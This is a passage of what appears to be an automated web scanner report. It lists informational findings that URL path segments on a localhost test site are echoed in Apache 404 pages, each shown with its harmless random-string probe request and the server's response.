19.47. http://localhost/examplewebiste/docs/pdf.html [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/pdf.html7etupnxwj0 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/pdf.html7etupnxwj0 was not found on this server.</p>
...[SNIP]...
19.48. http://localhost/examplewebiste/docs/pdf.html [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteq257cauak5/docs/pdf.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteq257cauak5/docs/pdf.html was not found on this server.</p>
...[SNIP]...
19.49. http://localhost/examplewebiste/docs/pdf.html [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsc6zpfllnu3/pdf.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsc6zpfllnu3/pdf.html was not found on this server.</p>
...[SNIP]...
19.50. http://localhost/examplewebiste/examplewebiste [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste2vee6kjoii HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste2vee6kjoii was not found on this server.</p>
...[SNIP]...
19.51. http://localhost/examplewebiste/examplewebiste [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste3flk8o2fg5/examplewebiste HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste3flk8o2fg5/examplewebiste was not found on this server.</p>
...[SNIP]...
19.52. http://localhost/examplewebiste/examplewebiste/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisterd9vqosnei/examplewebiste/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisterd9vqosnei/examplewebiste/ was not found on this server.</p>
...[SNIP]...
19.53. http://localhost/examplewebiste/examplewebiste/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistee6w52dj40g/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistee6w52dj40g/ was not found on this server.</p>
...[SNIP]...
19.54. http://localhost/examplewebiste/examplewebiste/css [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/cssa4e3bi5qwv HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/cssa4e3bi5qwv was not found on this server.</p>
...[SNIP]...
19.55. http://localhost/examplewebiste/examplewebiste/css [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistejhou34yypr/examplewebiste/css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistejhou34yypr/examplewebiste/css was not found on this server.</p>
...[SNIP]...
19.56. http://localhost/examplewebiste/examplewebiste/css [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteds3sy4w932/css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteds3sy4w932/css was not found on this server.</p>
...[SNIP]...
19.57. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteoedmb7ynjd/examplewebiste/css/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteoedmb7ynjd/examplewebiste/css/ was not found on this server.</p>
...[SNIP]...
19.58. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteyooie6cexy/css/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteyooie6cexy/css/ was not found on this server.</p>
...[SNIP]...
19.59. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/css0ldxokxx42/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/css0ldxokxx42/ was not found on this server.</p>
...[SNIP]...
19.60. http://localhost/examplewebiste/examplewebiste/images [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/imagesnvn8201vtm HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/imagesnvn8201vtm was not found on this server.</p>
...[SNIP]...
19.61. http://localhost/examplewebiste/examplewebiste/images [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste7swbv6mtt3/examplewebiste/images HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste7swbv6mtt3/examplewebiste/images was not found on this server.</p>
...[SNIP]...
19.62. http://localhost/examplewebiste/examplewebiste/images [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteafr64t5b7d/images HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteafr64t5b7d/images was not found on this server.</p>
...[SNIP]...
19.63. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteqz1ry3i1k7/examplewebiste/images/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteqz1ry3i1k7/examplewebiste/images/ was not found on this server.</p>
...[SNIP]...
19.64. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteq1nmo7f8nj/images/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteq1nmo7f8nj/images/ was not found on this server.</p>
...[SNIP]...
19.65. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/images8gqjaytmc1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/images8gqjaytmc1/ was not found on this server.</p>
...[SNIP]...
19.66. http://localhost/examplewebiste/examplewebiste/includes [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includespbuz6082qc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includespbuz6082qc was not found on this server.</p>
...[SNIP]...
19.67. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistezyl8ejmlgb/examplewebiste/includes HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistezyl8ejmlgb/examplewebiste/includes was not found on this server.</p>
...[SNIP]...
19.68. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistej1sp4ewpsl/includes HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistej1sp4ewpsl/includes was not found on this server.</p>
...[SNIP]...
19.69. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistea1udhp44cp/examplewebiste/includes/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistea1udhp44cp/examplewebiste/includes/ was not found on this server.</p>
...[SNIP]...
19.70. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistetd991xdzgp/includes/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistetd991xdzgp/includes/ was not found on this server.</p>
...[SNIP]...
19.71. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includesy54br9jr6i/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includesy54br9jr6i/ was not found on this server.</p>
...[SNIP]...
19.72. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

